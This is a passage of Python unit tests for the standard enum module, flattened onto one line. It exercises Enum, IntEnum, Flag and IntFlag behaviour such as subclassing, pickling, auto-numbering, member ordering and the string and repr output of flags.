self.assertEqual(len(SummerMonth), 3, SummerMonth) self.assertEqual([SummerMonth.june, SummerMonth.july, SummerMonth. august], lst) for i, month in enumerate('june july august'.split(), 40): e = SummerMonth(i) self.assertEqual(e, i) self.assertEqual(e.name, month) self.assertIn(e, SummerMonth) self.assertIs(type(e), SummerMonth) def test_subclassing(self): if isinstance(Name, Exception): raise Name self.assertEqual(Name.BDFL, 'Guido van Rossum') self.assertTrue(Name.BDFL, Name('Guido van Rossum')) self.assertIs(Name.BDFL, getattr(Name, 'BDFL')) test_pickle_dump_load(self.assertIs, Name.BDFL) def test_extending(self): class Color(Enum): red = 1 green = 2 blue = 3 with self.assertRaises(TypeError): class MoreColor(Color): cyan = 4 magenta = 5 yellow = 6 def test_exclude_methods(self): class whatever(Enum): this = 'that' these = 'those' def really(self): return 'no, not %s' % self.value self.assertIsNot(type(whatever.really), whatever) self.assertEqual(whatever.this.really(), 'no, not that') def test_wrong_inheritance_order(self): with self.assertRaises(TypeError): class Wrong(Enum, str): NotHere = 'error before this point' def test_intenum_transitivity(self): class number(IntEnum): one = 1 two = 2 three = 3 class numero(IntEnum): uno = 1 dos = 2 tres = 3 self.assertEqual(number.one, numero.uno) self.assertEqual(number.two, numero.dos) self.assertEqual(number.three, numero.tres) def test_wrong_enum_in_call(self): class Monochrome(Enum): black = 0 white = 1 class Gender(Enum): male = 0 female = 1 self.assertRaises(ValueError, Monochrome, Gender.male) def test_wrong_enum_in_mixed_call(self): class Monochrome(IntEnum): black = 0 white = 1 class Gender(Enum): male = 0 female = 1 self.assertRaises(ValueError, Monochrome, Gender.male) def test_mixed_enum_in_call_1(self): class Monochrome(IntEnum): black = 0 white = 1 class Gender(IntEnum): male = 0 female = 1 self.assertIs(Monochrome(Gender.female), Monochrome.white) def test_mixed_enum_in_call_2(self): class Monochrome(Enum): black = 0 white = 1 class Gender(IntEnum): male = 0 female = 1 self.assertIs(Monochrome(Gender.male), Monochrome.black) def test_flufl_enum(self): class Fluflnum(Enum): def __int__(self): return int(self.value) class MailManOptions(Fluflnum): option1 = 1 option2 = 2 option3 = 3 self.assertEqual(int(MailManOptions.option1), 1) def test_introspection(self): class Number(IntEnum): one = 100 two = 200 self.assertIs(Number.one._member_type_, int) self.assertIs(Number._member_type_, int) class String(str, Enum): yarn = 'soft' rope = 'rough' wire = 'hard' self.assertIs(String.yarn._member_type_, str) self.assertIs(String._member_type_, str) class Plain(Enum): vanilla = 'white' one = 1 self.assertIs(Plain.vanilla._member_type_, object) self.assertIs(Plain._member_type_, object) def test_no_such_enum_member(self): class Color(Enum): red = 1 green = 2 blue = 3 with self.assertRaises(ValueError): Color(4) with self.assertRaises(KeyError): Color['chartreuse'] def test_new_repr(self): class Color(Enum): red = 1 green = 2 blue = 3 def __repr__(self): return "don't you just love shades of %s?" % self.name self.assertEqual(repr(Color.blue), "don't you just love shades of blue?") def test_inherited_repr(self): class MyEnum(Enum): def __repr__(self): return 'My name is %s.' % self.name class MyIntEnum(int, MyEnum): this = 1 that = 2 theother = 3 self.assertEqual(repr(MyIntEnum.that), 'My name is that.') def test_multiple_mixin_mro(self): class auto_enum(type(Enum)): def __new__(metacls, cls, bases, classdict): temp = type(classdict)() names = set(classdict._member_names) i = 0 for k in classdict._member_names: v = classdict[k] if v is Ellipsis: v = i else: i = v i += 1 temp[k] = v for k, v in classdict.items(): if k not in names: temp[k] = v return super(auto_enum, metacls).__new__(metacls, cls, bases, temp) class AutoNumberedEnum(Enum, metaclass=auto_enum): pass class AutoIntEnum(IntEnum, metaclass=auto_enum): pass class TestAutoNumber(AutoNumberedEnum): a = ... b = 3 c = ... class TestAutoInt(AutoIntEnum): a = ... b = 3 c = ... def test_subclasses_with_getnewargs(self): class NamedInt(int): __qualname__ = 'NamedInt' def __new__(cls, *args): _args = args name, *args = args if len(args) == 0: raise TypeError('name and value must be specified') self = int.__new__(cls, *args) self._intname = name self._args = _args return self def __getnewargs__(self): return self._args @property def __name__(self): return self._intname def __repr__(self): return '{}({!r}, {})'.format(type(self).__name__, self. __name__, int.__repr__(self)) def __str__(self): base = int base_str = base.__str__ if base_str.__objclass__ is object: return base.__repr__(self) return base_str(self) def __add__(self, other): temp = int(self) + int(other) if isinstance(self, NamedInt) and isinstance(other, NamedInt): return NamedInt('({0} + {1})'.format(self.__name__, other.__name__), temp) else: return temp class NEI(NamedInt, Enum): __qualname__ = 'NEI' x = 'the-x', 1 y = 'the-y', 2 self.assertIs(NEI.__new__, Enum.__new__) self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)") globals()['NamedInt'] = NamedInt globals()['NEI'] = NEI NI5 = NamedInt('test', 5) self.assertEqual(NI5, 5) test_pickle_dump_load(self.assertEqual, NI5, 5) self.assertEqual(NEI.y.value, 2) test_pickle_dump_load(self.assertIs, NEI.y) test_pickle_dump_load(self.assertIs, NEI) def test_subclasses_with_getnewargs_ex(self): class NamedInt(int): __qualname__ = 'NamedInt' def __new__(cls, *args): _args = args name, *args = args if len(args) == 0: raise TypeError('name and value must be specified') self = int.__new__(cls, *args) self._intname = name self._args = _args return self def __getnewargs_ex__(self): return self._args, {} @property def __name__(self): return self._intname def __repr__(self): return '{}({!r}, {})'.format(type(self).__name__, self. __name__, int.__repr__(self)) def __str__(self): base = int base_str = base.__str__ if base_str.__objclass__ is object: return base.__repr__(self) return base_str(self) def __add__(self, other): temp = int(self) + int(other) if isinstance(self, NamedInt) and isinstance(other, NamedInt): return NamedInt('({0} + {1})'.format(self.__name__, other.__name__), temp) else: return temp class NEI(NamedInt, Enum): __qualname__ = 'NEI' x = 'the-x', 1 y = 'the-y', 2 self.assertIs(NEI.__new__, Enum.__new__) self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)") globals()['NamedInt'] = NamedInt globals()['NEI'] = NEI NI5 = NamedInt('test', 5) self.assertEqual(NI5, 5) test_pickle_dump_load(self.assertEqual, NI5, 5) self.assertEqual(NEI.y.value, 2) test_pickle_dump_load(self.assertIs, NEI.y) test_pickle_dump_load(self.assertIs, NEI) def test_subclasses_with_reduce(self): class NamedInt(int): __qualname__ = 'NamedInt' def __new__(cls, *args): _args = args name, *args = args if len(args) == 0: raise TypeError('name and value must be specified') self = int.__new__(cls, *args) self._intname = name self._args = _args return self def __reduce__(self): return self.__class__, self._args @property def __name__(self): return self._intname def __repr__(self): return '{}({!r}, {})'.format(type(self).__name__, self. __name__, int.__repr__(self)) def __str__(self): base = int base_str = base.__str__ if base_str.__objclass__ is object: return base.__repr__(self) return base_str(self) def __add__(self, other): temp = int(self) + int(other) if isinstance(self, NamedInt) and isinstance(other, NamedInt): return NamedInt('({0} + {1})'.format(self.__name__, other.__name__), temp) else: return temp class NEI(NamedInt, Enum): __qualname__ = 'NEI' x = 'the-x', 1 y = 'the-y', 2 self.assertIs(NEI.__new__, Enum.__new__) self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)") globals()['NamedInt'] = NamedInt globals()['NEI'] = NEI NI5 = NamedInt('test', 5) self.assertEqual(NI5, 5) test_pickle_dump_load(self.assertEqual, NI5, 5) self.assertEqual(NEI.y.value, 2) test_pickle_dump_load(self.assertIs, NEI.y) test_pickle_dump_load(self.assertIs, NEI) def test_subclasses_with_reduce_ex(self): class NamedInt(int): __qualname__ = 'NamedInt' def __new__(cls, *args): _args = args name, *args = args if len(args) == 0: raise TypeError('name and value must be specified') self = int.__new__(cls, *args) self._intname = name self._args = _args return self def __reduce_ex__(self, proto): return self.__class__, self._args @property def __name__(self): return self._intname def __repr__(self): return '{}({!r}, {})'.format(type(self).__name__, self. __name__, int.__repr__(self)) def __str__(self): base = int base_str = base.__str__ if base_str.__objclass__ is object: return base.__repr__(self) return base_str(self) def __add__(self, other): temp = int(self) + int(other) if isinstance(self, NamedInt) and isinstance(other, NamedInt): return NamedInt('({0} + {1})'.format(self.__name__, other.__name__), temp) else: return temp class NEI(NamedInt, Enum): __qualname__ = 'NEI' x = 'the-x', 1 y = 'the-y', 2 self.assertIs(NEI.__new__, Enum.__new__) self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)") globals()['NamedInt'] = NamedInt globals()['NEI'] = NEI NI5 = NamedInt('test', 5) self.assertEqual(NI5, 5) test_pickle_dump_load(self.assertEqual, NI5, 5) self.assertEqual(NEI.y.value, 2) test_pickle_dump_load(self.assertIs, NEI.y) test_pickle_dump_load(self.assertIs, NEI) def test_subclasses_without_direct_pickle_support(self): class NamedInt(int): __qualname__ = 'NamedInt' def __new__(cls, *args): _args = args name, *args = args if len(args) == 0: raise TypeError('name and value must be specified') self = int.__new__(cls, *args) self._intname = name self._args = _args return self @property def __name__(self): return self._intname def __repr__(self): return '{}({!r}, {})'.format(type(self).__name__, self. __name__, int.__repr__(self)) def __str__(self): base = int base_str = base.__str__ if base_str.__objclass__ is object: return base.__repr__(self) return base_str(self) def __add__(self, other): temp = int(self) + int(other) if isinstance(self, NamedInt) and isinstance(other, NamedInt): return NamedInt('({0} + {1})'.format(self.__name__, other.__name__), temp) else: return temp class NEI(NamedInt, Enum): __qualname__ = 'NEI' x = 'the-x', 1 y = 'the-y', 2 self.assertIs(NEI.__new__, Enum.__new__) self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)") globals()['NamedInt'] = NamedInt globals()['NEI'] = NEI NI5 = NamedInt('test', 5) self.assertEqual(NI5, 5) self.assertEqual(NEI.y.value, 2) test_pickle_exception(self.assertRaises, TypeError, NEI.x) test_pickle_exception(self.assertRaises, PicklingError, NEI) def test_subclasses_without_direct_pickle_support_using_name(self): class NamedInt(int): __qualname__ = 'NamedInt' def __new__(cls, *args): _args = args name, *args = args if len(args) == 0: raise TypeError('name and value must be specified') self = int.__new__(cls, *args) self._intname = name self._args = _args return self @property def __name__(self): return self._intname def __repr__(self): return '{}({!r}, {})'.format(type(self).__name__, self. __name__, int.__repr__(self)) def __str__(self): base = int base_str = base.__str__ if base_str.__objclass__ is object: return base.__repr__(self) return base_str(self) def __add__(self, other): temp = int(self) + int(other) if isinstance(self, NamedInt) and isinstance(other, NamedInt): return NamedInt('({0} + {1})'.format(self.__name__, other.__name__), temp) else: return temp class NEI(NamedInt, Enum): __qualname__ = 'NEI' x = 'the-x', 1 y = 'the-y', 2 def __reduce_ex__(self, proto): return getattr, (self.__class__, self._name_) self.assertIs(NEI.__new__, Enum.__new__) self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)") globals()['NamedInt'] = NamedInt globals()['NEI'] = NEI NI5 = NamedInt('test', 5) self.assertEqual(NI5, 5) self.assertEqual(NEI.y.value, 2) test_pickle_dump_load(self.assertIs, NEI.y) test_pickle_dump_load(self.assertIs, NEI) def test_tuple_subclass(self): class SomeTuple(tuple, Enum): __qualname__ = 'SomeTuple' first = 1, 'for the money' second = 2, 'for the show' third = 3, 'for the music' self.assertIs(type(SomeTuple.first), SomeTuple) self.assertIsInstance(SomeTuple.second, tuple) self.assertEqual(SomeTuple.third, (3, 'for the music')) globals()['SomeTuple'] = SomeTuple test_pickle_dump_load(self.assertIs, SomeTuple.first) def test_duplicate_values_give_unique_enum_items(self): class AutoNumber(Enum): first = () second = () third = () def __new__(cls): value = len(cls.__members__) + 1 obj = object.__new__(cls) obj._value_ = value return obj def __int__(self): return int(self._value_) self.assertEqual(list(AutoNumber), [AutoNumber.first, AutoNumber. second, AutoNumber.third]) self.assertEqual(int(AutoNumber.second), 2) self.assertEqual(AutoNumber.third.value, 3) self.assertIs(AutoNumber(1), AutoNumber.first) def test_inherited_new_from_enhanced_enum(self): class AutoNumber(Enum): def __new__(cls): value = len(cls.__members__) + 1 obj = object.__new__(cls) obj._value_ = value return obj def __int__(self): return int(self._value_) class Color(AutoNumber): red = () green = () blue = () self.assertEqual(list(Color), [Color.red, Color.green, Color.blue]) self.assertEqual(list(map(int, Color)), [1, 2, 3]) def test_inherited_new_from_mixed_enum(self): class AutoNumber(IntEnum): def __new__(cls): value = len(cls.__members__) + 1 obj = int.__new__(cls, value) obj._value_ = value return obj class Color(AutoNumber): red = () green = () blue = () self.assertEqual(list(Color), [Color.red, Color.green, Color.blue]) self.assertEqual(list(map(int, Color)), [1, 2, 3]) def test_equality(self): class AlwaysEqual: def __eq__(self, other): return True class OrdinaryEnum(Enum): a = 1 self.assertEqual(AlwaysEqual(), OrdinaryEnum.a) self.assertEqual(OrdinaryEnum.a, AlwaysEqual()) def test_ordered_mixin(self): class OrderedEnum(Enum): def __ge__(self, other): if self.__class__ is other.__class__: return self._value_ >= other._value_ return NotImplemented def __gt__(self, other): if self.__class__ is other.__class__: return self._value_ > other._value_ return NotImplemented def __le__(self, other): if self.__class__ is other.__class__: return self._value_ <= other._value_ return NotImplemented def __lt__(self, other): if self.__class__ is other.__class__: return self._value_ < other._value_ return NotImplemented class Grade(OrderedEnum): A = 5 B = 4 C = 3 D = 2 F = 1 self.assertGreater(Grade.A, Grade.B) self.assertLessEqual(Grade.F, Grade.C) self.assertLess(Grade.D, Grade.A) self.assertGreaterEqual(Grade.B, Grade.B) self.assertEqual(Grade.B, Grade.B) self.assertNotEqual(Grade.C, Grade.D) def test_extending2(self): class Shade(Enum): def shade(self): print(self.name) class Color(Shade): red = 1 green = 2 blue = 3 with self.assertRaises(TypeError): class MoreColor(Color): cyan = 4 magenta = 5 yellow = 6 def test_extending3(self): class Shade(Enum): def shade(self): return self.name class Color(Shade): def hex(self): return '%s hexlified!' % self.value class MoreColor(Color): cyan = 4 magenta = 5 yellow = 6 self.assertEqual(MoreColor.magenta.hex(), '5 hexlified!') def test_no_duplicates(self): class UniqueEnum(Enum): def __init__(self, *args): cls = self.__class__ if any(self.value == e.value for e in cls): a = self.name e = cls(self.value).name raise ValueError( 'aliases not allowed in UniqueEnum: %r --> %r' % ( a, e)) class Color(UniqueEnum): red = 1 green = 2 blue = 3 with self.assertRaises(ValueError): class Color(UniqueEnum): red = 1 green = 2 blue = 3 grene = 2 def test_init(self): class Planet(Enum): MERCURY = 3.303e+23, 2439700.0 VENUS = 4.869e+24, 6051800.0 EARTH = 5.976e+24, 6378140.0 MARS = 6.421e+23, 3397200.0 JUPITER = 1.9e+27, 71492000.0 SATURN = 5.688e+26, 60268000.0 URANUS = 8.686e+25, 25559000.0 NEPTUNE = 1.024e+26, 24746000.0 def __init__(self, mass, radius): self.mass = mass self.radius = radius @property def surface_gravity(self): G = 6.673e-11 return G * self.mass / (self.radius * self.radius) self.assertEqual(round(Planet.EARTH.surface_gravity, 2), 9.8) self.assertEqual(Planet.EARTH.value, (5.976e+24, 6378140.0)) def test_nonhash_value(self): class AutoNumberInAList(Enum): def __new__(cls): value = [len(cls.__members__) + 1] obj = object.__new__(cls) obj._value_ = value return obj class ColorInAList(AutoNumberInAList): red = () green = () blue = () self.assertEqual(list(ColorInAList), [ColorInAList.red, ColorInAList.green, ColorInAList.blue]) for enum, value in zip(ColorInAList, range(3)): value += 1 self.assertEqual(enum.value, [value]) self.assertIs(ColorInAList([value]), enum) def test_conflicting_types_resolved_in_new(self): class LabelledIntEnum(int, Enum): def __new__(cls, *args): value, label = args obj = int.__new__(cls, value) obj.label = label obj._value_ = value return obj class LabelledList(LabelledIntEnum): unprocessed = 1, 'Unprocessed' payment_complete = 2, 'Payment Complete' self.assertEqual(list(LabelledList), [LabelledList.unprocessed, LabelledList.payment_complete]) self.assertEqual(LabelledList.unprocessed, 1) self.assertEqual(LabelledList(1), LabelledList.unprocessed) def test_auto_number(self): class Color(Enum): red = auto() blue = auto() green = auto() self.assertEqual(list(Color), [Color.red, Color.blue, Color.green]) self.assertEqual(Color.red.value, 1) self.assertEqual(Color.blue.value, 2) self.assertEqual(Color.green.value, 3) def test_auto_name(self): class Color(Enum): def _generate_next_value_(name, start, count, last): return name red = auto() blue = auto() green = auto() self.assertEqual(list(Color), [Color.red, Color.blue, Color.green]) self.assertEqual(Color.red.value, 'red') self.assertEqual(Color.blue.value, 'blue') self.assertEqual(Color.green.value, 'green') def test_auto_name_inherit(self): class AutoNameEnum(Enum): def _generate_next_value_(name, start, count, last): return name class Color(AutoNameEnum): red = auto() blue = auto() green = auto() self.assertEqual(list(Color), [Color.red, Color.blue, Color.green]) self.assertEqual(Color.red.value, 'red') self.assertEqual(Color.blue.value, 'blue') self.assertEqual(Color.green.value, 'green') def test_auto_garbage(self): class Color(Enum): red = 'red' blue = auto() self.assertEqual(Color.blue.value, 1) def test_auto_garbage_corrected(self): class Color(Enum): red = 'red' blue = 2 green = auto() self.assertEqual(list(Color), [Color.red, Color.blue, Color.green]) self.assertEqual(Color.red.value, 'red') self.assertEqual(Color.blue.value, 2) self.assertEqual(Color.green.value, 3) def test_duplicate_auto(self): class Dupes(Enum): first = primero = auto() second = auto() third = auto() self.assertEqual([Dupes.first, Dupes.second, Dupes.third], list(Dupes)) class TestOrder(unittest.TestCase): def test_same_members(self): class Color(Enum): _order_ = 'red green blue' red = 1 green = 2 blue = 3 def test_same_members_with_aliases(self): class Color(Enum): _order_ = 'red green blue' red = 1 green = 2 blue = 3 verde = green def test_same_members_wrong_order(self): with self.assertRaisesRegex(TypeError, 'member order does not match _order_'): class Color(Enum): _order_ = 'red green blue' red = 1 blue = 3 green = 2 def test_order_has_extra_members(self): with self.assertRaisesRegex(TypeError, 'member order does not match _order_'): class Color(Enum): _order_ = 'red green blue purple' red = 1 green = 2 blue = 3 def test_order_has_extra_members_with_aliases(self): with self.assertRaisesRegex(TypeError, 'member order does not match _order_'): class Color(Enum): _order_ = 'red green blue purple' red = 1 green = 2 blue = 3 verde = green def test_enum_has_extra_members(self): with self.assertRaisesRegex(TypeError, 'member order does not match _order_'): class Color(Enum): _order_ = 'red green blue' red = 1 green = 2 blue = 3 purple = 4 def test_enum_has_extra_members_with_aliases(self): with self.assertRaisesRegex(TypeError, 'member order does not match _order_'): class Color(Enum): _order_ = 'red green blue' red = 1 green = 2 blue = 3 purple = 4 verde = green class TestFlag(unittest.TestCase): """Tests of the Flags.""" class Perm(Flag): R, W, X = 4, 2, 1 class Open(Flag): RO = 0 WO = 1 RW = 2 AC = 3 CE = 1 << 19 def test_str(self): Perm = self.Perm self.assertEqual(str(Perm.R), 'Perm.R') self.assertEqual(str(Perm.W), 'Perm.W') self.assertEqual(str(Perm.X), 'Perm.X') self.assertEqual(str(Perm.R | Perm.W), 'Perm.R|W') self.assertEqual(str(Perm.R | Perm.W | Perm.X), 'Perm.R|W|X') self.assertEqual(str(Perm(0)), 'Perm.0') self.assertEqual(str(~Perm.R), 'Perm.W|X') self.assertEqual(str(~Perm.W), 'Perm.R|X') self.assertEqual(str(~Perm.X), 'Perm.R|W') self.assertEqual(str(~(Perm.R | Perm.W)), 'Perm.X') self.assertEqual(str(~(Perm.R | Perm.W | Perm.X)), 'Perm.0') self.assertEqual(str(Perm(~0)), 'Perm.R|W|X') Open = self.Open self.assertEqual(str(Open.RO), 'Open.RO') self.assertEqual(str(Open.WO), 'Open.WO') self.assertEqual(str(Open.AC), 'Open.AC') self.assertEqual(str(Open.RO | Open.CE), 'Open.CE') self.assertEqual(str(Open.WO | Open.CE), 'Open.CE|WO') self.assertEqual(str(~Open.RO), 'Open.CE|AC|RW|WO') self.assertEqual(str(~Open.WO), 'Open.CE|RW') self.assertEqual(str(~Open.AC), 'Open.CE') self.assertEqual(str(~(Open.RO | Open.CE)), 'Open.AC') self.assertEqual(str(~(Open.WO | Open.CE)), 'Open.RW') def test_repr(self): Perm = self.Perm self.assertEqual(repr(Perm.R), '<Perm.R: 4>') self.assertEqual(repr(Perm.W), '<Perm.W: 2>') self.assertEqual(repr(Perm.X), '<Perm.X: 1>') self.assertEqual(repr(Perm.R | Perm.W), '<Perm.R|W: 6>') self.assertEqual(repr(Perm.R | Perm.W | Perm.X), '<Perm.R|W|X: 7>') self.assertEqual(repr(Perm(0)), '<Perm.0: 0>') self.assertEqual(repr(~Perm.R), '<Perm.W|X: 3>') self.assertEqual(repr(~Perm.W), '<Perm.R|X: 5>') self.assertEqual(repr(~Perm.X), '<Perm.R|W: 6>') self.assertEqual(repr(~(Perm.R | Perm.W)), '<Perm.X: 1>') self.assertEqual(repr(~(Perm.R | Perm.W | Perm.X)), '<Perm.0: 0>') self.assertEqual(repr(Perm(~0)), '<Perm.R|W|X: 7>') Open = self.Open self.assertEqual(repr(Open.RO), '<Open.RO: 0>') self.assertEqual(repr(Open.WO), '<Open.WO: 1>') self.assertEqual(repr(Open.AC), '<Open.AC: 3>') self.assertEqual(repr(Open.RO | Open.CE), '<Open.CE: 524288>') self.assertEqual(repr(Open.WO | Open.CE), '<Open.CE|WO: 524289>') self.assertEqual(repr(~Open.RO), '<Open.CE|AC|RW|WO: 524291>') self.assertEqual(repr(~Open.WO), '<Open.CE|RW: 524290>') self.assertEqual(repr(~Open.AC), '<Open.CE: 524288>') self.assertEqual(repr(~(Open.RO | Open.CE)), '<Open.AC: 3>') self.assertEqual(repr(~(Open.WO | Open.CE)), '<Open.RW: 2>') def test_or(self): Perm = self.Perm for i in Perm: for j in Perm: self.assertEqual(i | j, Perm(i.value | j.value)) self.assertEqual((i | j).value, i.value | j.value) self.assertIs(type(i | j), Perm) for i in Perm: self.assertIs(i | i, i) Open = self.Open self.assertIs(Open.RO | Open.CE, Open.CE) def test_and(self): Perm = self.Perm RW = Perm.R | Perm.W RX = Perm.R | Perm.X WX = Perm.W | Perm.X RWX = Perm.R | Perm.W | Perm.X values = list(Perm) + [RW, RX, WX, RWX, Perm(0)] for i in values: for j in values: self.assertEqual((i & j).value, i.value & j.value) self.assertIs(type(i & j), Perm) for i in Perm: self.assertIs(i & i, i) self.assertIs(i & RWX, i) self.assertIs(RWX & i, i) Open = self.Open self.assertIs(Open.RO & Open.CE, Open.RO) def test_xor(self): Perm = self.Perm for i in Perm: for j in Perm: self.assertEqual((i ^ j).value, i.value ^ j.value) self.assertIs(type(i ^ j), Perm) for i in Perm: self.assertIs(i ^ Perm(0), i) self.assertIs(Perm(0) ^ i, i) Open = self.Open self.assertIs(Open.RO ^ Open.CE, Open.CE) self.assertIs(Open.CE ^ Open.CE, Open.RO) def test_invert(self): Perm = self.Perm RW = Perm.R | Perm.W RX = Perm.R | Perm.X WX = Perm.W | Perm.X RWX = Perm.R | Perm.W | Perm.X values = list(Perm) + [RW, RX, WX, RWX, Perm(0)] for i in values: self.assertIs(type(~i), Perm) self.assertEqual(~~i, i) for i in Perm: self.assertIs(~~i, i) Open = self.Open self.assertIs(Open.WO & ~Open.WO, Open.RO) self.assertIs((Open.WO | Open.CE) & ~Open.WO, Open.CE) def test_bool(self): Perm = self.Perm for f in Perm: self.assertTrue(f) Open = self.Open for f in Open: self.assertEqual(bool(f.value), bool(f)) def test_programatic_function_string(self): Perm = Flag('Perm', 'R W X') lst = list(Perm) self.assertEqual(len(lst), len(Perm)) self.assertEqual(len(Perm), 3, Perm) self.assertEqual(lst, [Perm.R, Perm.W, Perm.X]) for i, n in enumerate('R W X'.split()): v = 1 << i e = Perm(v) self.assertEqual(e.value, v) self.assertEqual(type(e.value), int) self.assertEqual(e.name, n) self.assertIn(e, Perm) self.assertIs(type(e), Perm) def test_programatic_function_string_with_start(self): Perm = Flag('Perm', 'R W X', start=8) lst = list(Perm) self.assertEqual(len(lst), len(Perm)) self.assertEqual(len(Perm), 3, Perm) self.assertEqual(lst, [Perm.R, Perm.W, Perm.X]) for i, n in enumerate('R W X'.split()): v = 8 << i e = Perm(v) self.assertEqual(e.value, v) self.assertEqual(type(e.value), int) self.assertEqual(e.name, n) self.assertIn(e, Perm) self.assertIs(type(e), Perm) def test_programatic_function_string_list(self): Perm = Flag('Perm', ['R', 'W', 'X']) lst = list(Perm) self.assertEqual(len(lst), len(Perm)) self.assertEqual(len(Perm), 3, Perm) self.assertEqual(lst, [Perm.R, Perm.W, Perm.X]) for i, n in enumerate('R W X'.split()): v = 1 << i e = Perm(v) self.assertEqual(e.value, v) self.assertEqual(type(e.value), int) self.assertEqual(e.name, n) self.assertIn(e, Perm) self.assertIs(type(e), Perm) def test_programatic_function_iterable(self): Perm = Flag('Perm', (('R', 2), ('W', 8), ('X', 32))) lst = list(Perm) self.assertEqual(len(lst), len(Perm)) self.assertEqual(len(Perm), 3, Perm) self.assertEqual(lst, [Perm.R, Perm.W, Perm.X]) for i, n in enumerate('R W X'.split()): v = 1 << 2 * i + 1 e = Perm(v) self.assertEqual(e.value, v) self.assertEqual(type(e.value), int) self.assertEqual(e.name, n) self.assertIn(e, Perm) self.assertIs(type(e), Perm) def test_programatic_function_from_dict(self): Perm = Flag('Perm', OrderedDict((('R', 2), ('W', 8), ('X', 32)))) lst = list(Perm) self.assertEqual(len(lst), len(Perm)) self.assertEqual(len(Perm), 3, Perm) self.assertEqual(lst, [Perm.R, Perm.W, Perm.X]) for i, n in enumerate('R W X'.split()): v = 1 << 2 * i + 1 e = Perm(v) self.assertEqual(e.value, v) self.assertEqual(type(e.value), int) self.assertEqual(e.name, n) self.assertIn(e, Perm) self.assertIs(type(e), Perm) def test_pickle(self): if isinstance(FlagStooges, Exception): raise FlagStooges test_pickle_dump_load(self.assertIs, FlagStooges.CURLY | FlagStooges.MOE) test_pickle_dump_load(self.assertIs, FlagStooges) def test_containment(self): Perm = self.Perm R, W, X = Perm RW = R | W RX = R | X WX = W | X RWX = R | W | X self.assertTrue(R in RW) self.assertTrue(R in RX) self.assertTrue(R in RWX) self.assertTrue(W in RW) self.assertTrue(W in WX) self.assertTrue(W in RWX) self.assertTrue(X in RX) self.assertTrue(X in WX) self.assertTrue(X in RWX) self.assertFalse(R in WX) self.assertFalse(W in RX) self.assertFalse(X in RW) def test_auto_number(self): class Color(Flag): red = auto() blue = auto() green = auto() self.assertEqual(list(Color), [Color.red, Color.blue, Color.green]) self.assertEqual(Color.red.value, 1) self.assertEqual(Color.blue.value, 2) self.assertEqual(Color.green.value, 4) def test_auto_number_garbage(self): with self.assertRaisesRegex(TypeError, 'Invalid Flag value: .not an int.'): class Color(Flag): red = 'not an int' blue = auto() def test_cascading_failure(self): class Bizarre(Flag): c = 3 d = 4 f = 6 self.assertRaisesRegex(ValueError, '5 is not a valid Bizarre', Bizarre, 5) self.assertRaisesRegex(ValueError, '5 is not a valid Bizarre', Bizarre, 5) self.assertRaisesRegex(ValueError, '2 is not a valid Bizarre', Bizarre, 2) self.assertRaisesRegex(ValueError, '2 is not a valid Bizarre', Bizarre, 2) self.assertRaisesRegex(ValueError, '1 is not a valid Bizarre', Bizarre, 1) self.assertRaisesRegex(ValueError, '1 is not a valid Bizarre', Bizarre, 1) def test_duplicate_auto(self): class Dupes(Enum): first = primero = auto() second = auto() third = auto() self.assertEqual([Dupes.first, Dupes.second, Dupes.third], list(Dupes)) def test_bizarre(self): class Bizarre(Flag): b = 3 c = 4 d = 6 self.assertEqual(repr(Bizarre(7)), '<Bizarre.d|c|b: 7>') @unittest.skipUnless(threading, 'Threading required for this test.') @support.reap_threads def test_unique_composite(self): class TestFlag(Flag): one = auto() two = auto() three = auto() four = auto() five = auto() six = auto() seven = auto() eight = auto() def __eq__(self, other): return self is other def __hash__(self): return hash(self._value_) seen = set() failed = False def cycle_enum(): nonlocal failed try: for i in range(256): seen.add(TestFlag(i)) except Exception: failed = True threads = [threading.Thread(target=cycle_enum) for _ in range(8)] with support.start_threads(threads): pass self.assertFalse(failed, 'at least one thread failed while creating composite members') self.assertEqual(256, len(seen), 'too many composite members created') class TestIntFlag(unittest.TestCase): """Tests of the IntFlags.""" class Perm(IntFlag): X = 1 << 0 W = 1 << 1 R = 1 << 2 class Open(IntFlag): RO = 0 WO = 1 RW = 2 AC = 3 CE = 1 << 19 def test_type(self): Perm = self.Perm Open = self.Open for f in Perm: self.assertTrue(isinstance(f, Perm)) self.assertEqual(f, f.value) self.assertTrue(isinstance(Perm.W | Perm.X, Perm)) self.assertEqual(Perm.W | Perm.X, 3) for f in Open: self.assertTrue(isinstance(f, Open)) self.assertEqual(f, f.value) self.assertTrue(isinstance(Open.WO | Open.RW, Open)) self.assertEqual(Open.WO | Open.RW, 3) def test_str(self): Perm = self.Perm self.assertEqual(str(Perm.R), 'Perm.R') self.assertEqual(str(Perm.W), 'Perm.W') self.assertEqual(str(Perm.X), 'Perm.X') self.assertEqual(str(Perm.R | Perm.W), 'Perm.R|W') self.assertEqual(str(Perm.R | Perm.W | Perm.X), 'Perm.R|W|X') self.assertEqual(str(Perm.R | 8), 'Perm.8|R') self.assertEqual(str(Perm(0)), 'Perm.0') self.assertEqual(str(Perm(8)), 'Perm.8') self.assertEqual(str(~Perm.R), 'Perm.W|X') self.assertEqual(str(~Perm.W), 'Perm.R|X') self.assertEqual(str(~Perm.X), 'Perm.R|W') self.assertEqual(str(~(Perm.R | Perm.W)), 'Perm.X') self.assertEqual(str(~(Perm.R | Perm.W | Perm.X)), 'Perm.-8') self.assertEqual(str(~(Perm.R | 8)), 'Perm.W|X') self.assertEqual(str(Perm(~0)), 'Perm.R|W|X') self.assertEqual(str(Perm(~8)), 'Perm.R|W|X') Open = self.Open self.assertEqual(str(Open.RO), 'Open.RO') self.assertEqual(str(Open.WO), 'Open.WO') self.assertEqual(str(Open.AC), 'Open.AC') self.assertEqual(str(Open.RO | Open.CE), 'Open.CE') self.assertEqual(str(Open.WO | Open.CE), 'Open.CE|WO') self.assertEqual(str(Open(4)), 'Open.4') self.assertEqual(str(~Open.RO), 'Open.CE|AC|RW|WO') self.assertEqual(str(~Open.WO), 'Open.CE|RW') self.assertEqual(str(~Open.AC), 'Open.CE') self.assertEqual(str(~(Open.RO | Open.CE)), 'Open.AC|RW|WO') self.assertEqual(str(~(Open.WO | Open.CE)), 'Open.RW') 